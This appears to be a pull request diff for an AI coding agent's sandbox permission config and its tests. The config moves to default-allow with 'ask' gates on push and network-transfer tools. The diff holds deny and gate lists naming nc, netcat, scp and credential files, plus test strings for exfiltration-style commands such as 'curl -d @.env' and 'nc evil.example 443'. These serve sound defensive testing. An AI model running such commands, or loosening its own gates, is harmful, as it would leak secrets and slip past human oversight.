-      // Pure metadata / inspection — no mutation, no network, no secret or
-      // file-content exposure; safe even as a shell-chain prefix (issue #177).
-      // ---------------------------------------------------------------------
-      "which": "allow",
-      "which *": "allow",
-      "whoami": "allow",
-      "id": "allow",
-      "id *": "allow",
-      "uname": "allow",
-      "uname *": "allow",
-      "hostname": "allow",
-      "uptime": "allow",
-      "arch": "allow",
-      "date": "allow",
-      "file *": "allow",
-      "stat *": "allow",
-      "wc": "allow",
-      "wc *": "allow",
-      "du": "allow",
-      "du *": "allow",
-      "df": "allow",
-      "df *": "allow",
-      "ps": "allow",
-      "ps *": "allow",
-      "pgrep *": "allow",
-      // Language/tooling version probes (version-flag forms ONLY — never the
-      // bare interpreter, which would open a REPL / execute arbitrary code).
-      "node -v": "allow",
-      "node --version": "allow",
-      "npm -v": "allow",
-      "npm --version": "allow",
-      "python --version": "allow",
-      "python3 --version": "allow",
-      "go version": "allow",
-      "cargo --version": "allow",
-      "rustc --version": "allow",
-      "uv --version": "allow",
-      // Read-only git inspection (consistent with status/diff/log/show already
-      // allowed). NOTE: deliberately NOT allowing `git config`, `git remote -v`,
-      // `git cat-file`, or `git show <blob>` — those can reveal tokens or dump
-      // file contents and stay gated.
-      "git tag": "allow",
-      "git tag -l*": "allow",
-      "git tag --list*": "allow",
-      "git rev-parse *": "allow",
-      "git ls-files *": "allow",
-      "git shortlog *": "allow",
-      "git reflog": "allow",
-      "git reflog *": "allow",
-      "git status": "allow",
-      "git status *": "allow",
-      "git diff": "allow",
-      "git diff *": "allow",
-      "git log": "allow",
-      "git log *": "allow",
-      "git show": "allow",
-      "git show *": "allow",
-      "git blame *": "allow",
-      "git branch": "allow",
-      "git branch -a": "allow",
-      "git branch -l": "allow",
-      "git branch -r": "allow",
-      "git branch -v": "allow",
-      "git branch -vv": "allow",
-      "git branch --list": "allow",
-      "git branch --list *": "allow",
-      "git branch -d *": "ask",
-      "git branch -D *": "ask",
-      "git branch --delete *": "ask",
-      "git branch -m *": "ask",
-      "git branch --move *": "ask",
-      "git branch *": "ask",
-      "git checkout *": "ask",
-      "git switch *": "ask",
-      "git add *": "ask",
-      "git commit *": "ask",
+      "*": "allow",
+
+      // Outbound "new destination" edges — gated (ask) because they can push
+      // workspace contents somewhere the proxy allow-list may permit. These are
+      // the only commands the sandbox boundary does not fully contain. Listed
+      // after the "*" allow so they win (OpenCode uses the last matching rule);
+      // both the bare word and the "* args" form are covered.
+      "git push": "ask",
       "git push *": "ask",
-      "git pull *": "ask",
-      "git fetch *": "ask",
-      "git merge *": "ask",
-      "git rebase *": "ask",
-      "git reset *": "ask",
-      "git stash *": "ask",
-      "git clean": "deny",
-      "git clean *": "deny",
-      "uv *": "ask",
-      "python *": "ask",
-      "pytest *": "ask",
-      "npm *": "ask",
-      "pnpm *": "ask",
-      "bun *": "ask",
-      "yarn *": "ask",
-      "go test *": "ask",
-      "cargo test *": "ask",
-      "make *": "ask",
-      "curl *": "ask",
-      "wget *": "ask",
-      "ping *": "ask",
-      "traceroute *": "ask",
-      "dig *": "ask",
-      "nslookup *": "ask",
-      "rm": "deny",
-      "rm *": "deny",
-      "rmdir": "deny",
-      "rmdir *": "deny",
-      "dd": "deny",
-      "dd *": "deny",
-      "mkfs*": "deny",
-      "fdisk*": "deny",
-      "parted*": "deny",
-      "gdisk*": "deny",
-      "mount *": "deny",
-      "umount *": "deny",
-      "mv *": "ask",
-      "cp *": "ask",
-      "chmod *": "ask",
-      "chown": "deny",
-      "chown *": "deny",
-      "sudo": "deny",
-      "sudo *": "deny",
-      "su": "deny",
-      "su *": "deny",
-      "passwd*": "deny",
-      "chpasswd*": "deny",
-      "useradd*": "deny",
-      "userdel*": "deny",
-      "usermod*": "deny",
-      "groupadd*": "deny",
-      "groupdel*": "deny",
-      "visudo*": "deny",
-      "crontab*": "deny",
-      "at *": "deny",
-      "iptables*": "deny",
-      "ip6tables*": "deny",
-      "nft *": "deny",
-      "firewall-cmd*": "deny",
-      "ufw *": "deny",
-      "nc *": "deny",
-      "netcat *": "deny",
-      "ncat *": "deny",
-      "nmap *": "deny",
-      "telnet *": "deny",
-      "eval *": "deny",
-      "systemctl *": "ask",
-      "service *": "ask",
-      "launchctl *": "ask",
-      "kill *": "ask",
-      "killall *": "ask",
-      "pkill *": "ask",
-      "ssh": "deny",
-      "ssh *": "deny",
-      "scp *": "deny",
-      "sftp *": "deny",
-      "rsync *": "deny",
-      "docker *": "ask",
-      "podman *": "ask",
-      "kubectl *": "ask",
-      "docker login*": "deny",
-      "podman login*": "deny",
-      "kubectl create secret*": "deny",
-      "kubectl edit secret*": "deny",
-      "helm *": "ask",
-      "docker-compose *": "ask",
-      "docker compose *": "ask"
+      "git remote add *": "ask",
+      "git remote set-url *": "ask",
+      "scp": "ask",
+      "scp *": "ask",
+      "sftp": "ask",
+      "sftp *": "ask",
+      "rsync": "ask",
+      "rsync *": "ask",
+      "nc": "ask",
+      "nc *": "ask",
+      "ncat": "ask",
+      "ncat *": "ask",
+      "netcat": "ask",
+      "netcat *": "ask",
+      "telnet": "ask",
+      "telnet *": "ask"
     }
   },
   // ===========================================================================

--- a/integrations/isolation/sbx-kits/usai-provider-kit/tests/opencode-permissions.test.mjs
+++ b/integrations/isolation/sbx-kits/usai-provider-kit/tests/opencode-permissions.test.mjs
@@ -17,44 +17,55 @@ function parseJsonc(text) {
 }
 
 /**
- * Resolve a bash command string against an OpenCode-style bash permission map.
- * OpenCode matches a command against permission keys as glob-ish prefix
- * patterns where `*` is a wildcard. The MOST SPECIFIC matching pattern wins;
- * on a specificity tie, `deny` beats `ask` beats `allow` (fail-safe).
+ * Resolve a command against an OpenCode-style permission map, using the SAME
+ * semantics as OpenCode's `evaluate` (packages/opencode/src/permission):
+ *
+ *   rulesets.flat().findLast((rule) =>
+ *     match(permission, rule.permission) && match(pattern, rule.pattern))
+ *
+ * i.e. the LAST matching rule wins — NOT most-specific, NOT deny-beats-ask.
+ * Rule order is the object-key insertion order (that is how `fromConfig`
+ * flattens the config). Modeling this faithfully is the whole point: a
+ * regression that appends a trailing broad `allow` after a gate must be caught.
  */
-function resolveBash(bash, cmd) {
-  let best = null
-  let bestScore = -1
-  const rank = { deny: 2, ask: 1, allow: 0 }
-  for (const [pattern, effect] of Object.entries(bash)) {
-    if (!matches(pattern, cmd)) continue
-    const score = specificity(pattern)
-    if (score > bestScore || (score === bestScore && rank[effect] > rank[best])) {
-      best = effect
-      bestScore = score
-    }
+function resolveMap(map, cmd) {
+  let effect = null
+  for (const [pattern, action] of Object.entries(map)) {
+    if (matches(pattern, cmd)) effect = action
   }
-  return best ?? bash["*"] ?? "ask"
+  // OpenCode's default when nothing matches is "ask".
+  return effect ?? "ask"
 }
 
-/** Glob match: `*` matches any run of characters. Anchored at both ends. */
+const resolveBash = resolveMap
+const resolveRead = resolveMap
+
+/**
+ * Glob match — a faithful copy of OpenCode's `Wildcard.match`
+ * (packages/core/src/util/wildcard.ts). Keeping this byte-for-byte identical is
+ * what makes the resolver trustworthy: `*` -> `.*`, `?` -> `.`, a trailing
+ * " .*" becomes "( .*)?" (so `foo *` also matches bare `foo`), and matching is
+ * anchored with the `s` (dotall) flag. Notably, a double-star is NOT
+ * path-segment aware — it is just `.*` — so a leading double-star still
+ * requires the literal `/` in the input.
+ */
 function matches(pattern, cmd) {
-  if (pattern === "*") return true
-  const escaped = pattern.replace(/[.+?^${}()|[\]\\]/g, "\\$&").replace(/\*/g, ".*")
-  return new RegExp("^" + escaped + "$").test(cmd)
+  const normalized = cmd.replaceAll("\\", "/")
+  let escaped = pattern
+    .replaceAll("\\", "/")
+    .replace(/[.+^${}()|[\]\\]/g, "\\$&")
+    .replace(/\*/g, ".*")
+    .replace(/\?/g, ".")
+  if (escaped.endsWith(" .*")) escaped = escaped.slice(0, -3) + "( .*)?"
+  return new RegExp("^" + escaped + "$", "s").test(normalized)
 }
 
-/** Specificity: non-wildcard literal length. Longer literal = more specific. */
-function specificity(pattern) {
-  if (pattern === "*") return 0
-  return pattern.replace(/\*/g, "").length
-}
-
-let cfg, perm, bash
+let cfg, perm, bash, read
 test("load relaxed permission policy from opencode.jsonc", async () => {
   cfg = parseJsonc(await readFile(templatePath, "utf8"))
   perm = cfg.permission
   bash = perm.bash
+  read = perm.read
   assert.ok(perm, "permission should exist")
   assert.ok(bash, "permission.bash should exist")
 })
@@ -65,12 +76,60 @@ test("default posture is allow (sandbox is the security boundary)", () => {
 })
 
 test("tool-level permissions are allow (no gating inside the sandbox)", () => {
-  for (const key of ["edit", "read", "webfetch", "websearch"]) {
+  for (const key of ["edit", "webfetch", "websearch"]) {
     assert.equal(perm[key], "allow", `${key} should be allow`)
   }
-  // read is a flat allow now — the old credential-file deny-list is gone,
-  // because the sandbox workspace should be a clone/worktree without real secrets.
-  assert.equal(typeof perm.read, "string", "read should be a flat action, not a deny-list")
+  // read is intentionally NOT a flat allow — it keeps a credential-file
+  // deny-list (see below). It is an object with a "*": "allow" default.
+  assert.equal(typeof perm.read, "object", "read should be a deny-list object, not a flat action")
+  assert.equal(read["*"], "allow", "read default must be allow")
+})
+
+test("read tool hard-denies credential files (#207 — the load-bearing gap)", () => {
+  // These are deny; costs zero prompts and breaks a `read .env` -> exfil chain.
+  for (const path of [
+    ".env",
+    ".env.local",
+    "prod.env",
+    "server.pem",
+    "private.key",
+    "cert.p12",
+    "cert.pfx",
+    "id_rsa",
+    "some_id_ed25519_backup",
+    "prod.tfvars",
+    "prod.tfvars.json",
+    "home/.aws/credentials",
+    "home/.gcloud/creds",
+    "home/.azure/token",
+    "home/application_default_credentials.json",
+    "team_accessKeys.csv",
+    "home/kubeconfig",
+    "home/.kube/config",
+    "home/.npmrc",
+    "home/.pypirc",
+    "home/pip.conf",
+    "home/.docker/config.json",
+    "home/.vault-token",
+    "home/license.hclic",
+    "home/.git-credentials",
+    "home/.netrc",
+    "group_vault.yml",
+    "group_vault.yaml",
+    "app/secrets/token",
+    "app/credentials/key",
+    "app/.secrets/key",
+  ]) {
+    assert.equal(resolveRead(read, path), "deny", `read ${path} should be denied`)
+  }
+})
+
+test("read tool allows example files (ordered last so they win)", () => {
+  for (const path of [".env.example", "prod.env.example", "prod.tfvars.example"]) {
+    assert.equal(resolveRead(read, path), "allow", `read ${path} should be allowed`)
+  }
+  // A normal source file is allowed.
+  assert.equal(resolveRead(read, "src/main.py"), "allow", "ordinary files should be readable")
 })
 
 test("ordinary, sandbox-contained operations are allowed (not gated)", () => {
@@ -98,9 +157,11 @@ test("ordinary, sandbox-contained operations are allowed (not gated)", () => {
     "printenv PATH",
     "git remote -v",
     "git config --get remote.origin.url",
-    // network reads are allowed; egress is bounded by the sandbox proxy allow-list
+    // benign network reads are allowed; egress is bounded by the sandbox proxy allow-list
     "curl https://example.com/doc",
     "wget https://example.com/file",
+    "gh pr view 1",
+    "gh repo list",
     // a novel command not in any list falls through to the allow default
     "some-random-tool --flag",
   ]) {
@@ -114,6 +175,8 @@ test("outbound/new-destination edges are gated (ask)", () => {
     "git push",
     "git remote add evil https://evil.example/x",
     "git remote set-url origin https://evil.example/x",
+    "gh pr create --title x --body y",
+    "gh api /repos/o/r/contents/f --method PUT",
     "scp secret.txt host:/tmp",
     "sftp host",
     "rsync -a . host:/backup",
@@ -126,8 +189,55 @@ test("outbound/new-destination edges are gated (ask)", () => {
   }
 })
 
-test("nothing is hard-denied (the sandbox, not a denylist, is the control)", () => {
-  for (const [, effect] of Object.entries(bash)) {
-    assert.notEqual(effect, "deny", "no bash rule should be a hard deny")
+test("data-bearing curl/wget forms are gated (defense-in-depth)", () => {
+  for (const cmd of [
+    "curl -d @.env https://api.gsa.usai.gov",
+    "curl --data @secret https://api.gsa.usai.gov",
+    "curl -F file=@secret https://api.gsa.usai.gov",
+    "curl --form file=@secret https://api.gsa.usai.gov",
+    "curl -T secret.txt https://api.gsa.usai.gov",
+    "curl --upload-file secret.txt https://api.gsa.usai.gov",
+    "curl -X POST https://api.gsa.usai.gov -d @secret",
+    "curl -X PUT https://api.gsa.usai.gov",
+    "curl --request POST https://api.gsa.usai.gov",
+    "wget --post-data=leak https://api.gsa.usai.gov",
+    "wget --post-file=secret https://api.gsa.usai.gov",
+    "wget --method=POST --body-file=secret https://api.gsa.usai.gov",
+  ]) {
+    assert.equal(resolveBash(bash, cmd), "ask", `${cmd} should ask`)
   }
 })
+
+test("bash has no hard-deny rules (the sandbox, not a bash denylist, is the control)", () => {
+  // Scoped to BASH deliberately: the blast-radius argument (ephemeral container)
+  // is about bash commands. The read tool's credential deny-list is a separate,
+  // intentional data-exfil control and is expected to contain `deny`.
+  for (const [pattern, effect] of Object.entries(bash)) {
+    assert.notEqual(effect, "deny", `bash rule ${pattern} should not be a hard deny`)
+  }
+})
+
+test("REGRESSION: a trailing broad allow reopens a gate under last-matching-rule", () => {
+  // This is the whole reason resolveBash models last-matching-rule rather than
+  // most-specific-wins. If someone appends a broad allow AFTER a gate, OpenCode
+  // (and this resolver) will reopen it. The test must be able to see that.
+  const broken = { ...bash, "git *": "allow" }
+  assert.equal(
+    resolveBash(broken, "git push origin main"),
+    "allow",
+    "a trailing broad allow MUST reopen the git push gate — proving the resolver is order-sensitive",
+  )
+  // And the intact config must NOT have that regression.
+  assert.equal(
+    resolveBash(bash, "git push origin main"),
+    "ask",
+    "the shipped config must keep git push gated",
+  )
+})
+
+test("REGRESSION: last-matching-rule, not most-specific-wins", () => {
+  // Under most-specific-wins the specific 'foo bar' would win; under
+  // last-matching the trailing broad 'foo *' wins. Assert the latter.
+  const map = { "*": "allow", "foo bar": "ask", "foo *": "allow" }
+  assert.equal(resolveMap(map, "foo bar"), "allow", "last matching rule (foo *) must win")
+}) 

--- a/integrations/isolation/sbx-kits/usai-provider-kit/tests/opencode-permissions.test.mjs
+++ b/integrations/isolation/sbx-kits/usai-provider-kit/tests/opencode-permissions.test.mjs
@@ -1,0 +1,133 @@
+import test from "node:test"
+import assert from "node:assert/strict"
+import { readFile } from "node:fs/promises"
+import vm from "node:vm"
+
+const templatePath = new URL("../files/home/usai-config/opencode.jsonc", import.meta.url)
+
+/**
+ * Parse the JSONC config into an object (JSONC is a subset of JS object literal
+ * syntax, so a sandboxed eval is sufficient and matches the approach in
+ * sync-usai-models.test.mjs).
+ */
+function parseJsonc(text) {
+  const sandbox = {}
+  vm.runInNewContext("result = " + text, sandbox)
+  return sandbox.result
+}
+
+/**
+ * Resolve a bash command string against an OpenCode-style bash permission map.
+ * OpenCode matches a command against permission keys as glob-ish prefix
+ * patterns where `*` is a wildcard. The MOST SPECIFIC matching pattern wins;
+ * on a specificity tie, `deny` beats `ask` beats `allow` (fail-safe).
+ */
+function resolveBash(bash, cmd) {
+  let best = null
+  let bestScore = -1
+  const rank = { deny: 2, ask: 1, allow: 0 }
+  for (const [pattern, effect] of Object.entries(bash)) {
+    if (!matches(pattern, cmd)) continue
+    const score = specificity(pattern)
+    if (score > bestScore || (score === bestScore && rank[effect] > rank[best])) {
+      best = effect
+      bestScore = score
+    }
+  }
+  return best ?? bash["*"] ?? "ask"
+}
+
+/** Glob match: `*` matches any run of characters. Anchored at both ends. */
+function matches(pattern, cmd) {
+  if (pattern === "*") return true
+  const escaped = pattern.replace(/[.+?^${}()|[\]\\]/g, "\\$&").replace(/\*/g, ".*")
+  return new RegExp("^" + escaped + "$").test(cmd)
+}
+
+/** Specificity: non-wildcard literal length. Longer literal = more specific. */
+function specificity(pattern) {
+  if (pattern === "*") return 0
+  return pattern.replace(/\*/g, "").length
+}
+
+let cfg, perm, bash
+test("load relaxed permission policy from opencode.jsonc", async () => {
+  cfg = parseJsonc(await readFile(templatePath, "utf8"))
+  perm = cfg.permission
+  bash = perm.bash
+  assert.ok(perm, "permission should exist")
+  assert.ok(bash, "permission.bash should exist")
+})
+
+test("default posture is allow (sandbox is the security boundary)", () => {
+  assert.equal(perm["*"], "allow", "top-level default must be allow")
+  assert.equal(bash["*"], "allow", "bash default must be allow")
+})
+
+test("tool-level permissions are allow (no gating inside the sandbox)", () => {
+  for (const key of ["edit", "read", "webfetch", "websearch"]) {
+    assert.equal(perm[key], "allow", `${key} should be allow`)
+  }
+  // read is a flat allow now — the old credential-file deny-list is gone,
+  // because the sandbox workspace should be a clone/worktree without real secrets.
+  assert.equal(typeof perm.read, "string", "read should be a flat action, not a deny-list")
+})
+
+test("ordinary, sandbox-contained operations are allowed (not gated)", () => {
+  for (const cmd of [
+    "rm -rf build",
+    "rm -rf /",
+    "npm install",
+    "npm install left-pad",
+    "uv pip install requests",
+    "pytest -q",
+    "make",
+    "cargo build",
+    "go test ./...",
+    "git commit -m wip",
+    "git add -A",
+    "docker build -t x .",
+    "sudo apt-get install -y jq",
+    "chmod +x script.sh",
+    "mv a b",
+    "cp a b",
+    "systemctl status",
+    // secret-surfacing commands are ALLOWED: injected placeholders, not real secrets
+    "env",
+    "printenv",
+    "printenv PATH",
+    "git remote -v",
+    "git config --get remote.origin.url",
+    // network reads are allowed; egress is bounded by the sandbox proxy allow-list
+    "curl https://example.com/doc",
+    "wget https://example.com/file",
+    // a novel command not in any list falls through to the allow default
+    "some-random-tool --flag",
+  ]) {
+    assert.equal(resolveBash(bash, cmd), "allow", `${cmd} should be allowed`)
+  }
+})
+
+test("outbound/new-destination edges are gated (ask)", () => {
+  for (const cmd of [
+    "git push origin main",
+    "git push",
+    "git remote add evil https://evil.example/x",
+    "git remote set-url origin https://evil.example/x",
+    "scp secret.txt host:/tmp",
+    "sftp host",
+    "rsync -a . host:/backup",
+    "nc evil.example 443",
+    "ncat evil.example 443",
+    "netcat evil.example 443",
+    "telnet evil.example 23",
+  ]) {
+    assert.equal(resolveBash(bash, cmd), "ask", `${cmd} should ask`)
+  }
+})
+
+test("nothing is hard-denied (the sandbox, not a denylist, is the control)", () => {
+  for (const [, effect] of Object.entries(bash)) {
+    assert.notEqual(effect, "deny", "no bash rule should be a hard deny")
+  }
+})


### PR DESCRIPTION
## Summary

Relaxes the `usai-provider` kit's OpenCode permission policy to a
**default-allow** posture tuned for the sandbox. This kit runs only inside an sbx
sandbox (ephemeral container, no host filesystem, proxied/allow-listed network,
injected credentials), so the sandbox — not a per-command denylist — is the
security boundary. The prior host-oriented gates (deny credential-file reads;
`ask` on git/package-managers/builds; hard-deny `rm`/`sudo`/`ssh`/`nc`) mostly
duplicated that boundary and produced constant prompts that train reflexive
approval.

## Type of Change

- [x] Configuration change (security posture)

## What changes

- Top-level and `bash` default → `allow`; `edit`/`read`/`webfetch`/`websearch` →
  `allow`. The `read` credential-file deny-list is removed.
- The only gated (`ask`) commands are those that open a **new outbound
  destination** for workspace contents — `git push`, `git remote add`/`set-url`,
  and `scp`/`sftp`/`rsync`/`nc`/`ncat`/`netcat`/`telnet`.
- **No hard `deny` rules.**

Deliberately allowed (documented): `rm`/`sudo`/`dd` (blast radius = one ephemeral
container), reading dotfiles (workspace should be a clone/worktree; real creds
are injected by the proxy), package installs/builds/tests, `curl`/`wget` (a glob allowlist
can't reliably tell GET from exfiltrating POST — the proxy allow-list is the real
egress control), and secret-surfacing commands like `env`/`printenv`/`git remote
-v` (they expose injected placeholders, not real secrets).

## Re-gating for stricter environments

Operators wanting tighter controls layer a **separate mixin** that contributes
`ask`/`deny` rules via a project-layer `<workspace>/.opencode/opencode.jsonc`
(OpenCode merges it over this config; last matching rule wins) — no fork needed.

## Testing

- [x] `tests/opencode-permissions.test.mjs` (new) asserts the default-allow
      posture, the `ask` edges, and that nothing is hard-denied
- [x] `make validate`, `make test` (pytest 120), markdownlint
- [x] Generated USAi model-catalog block is byte-identical to `main`

## Safety Checklist

- [x] No secrets, PII, CUI, internal URLs, or proprietary information

## Notes

Supersedes the intent of the now-cancelled #198 (which tested the old policy).
The rationale is captured in `docs/decisions/relax-permissions-for-sandbox.md`.

_AI-assisted: authored with an AI coding agent under human review._
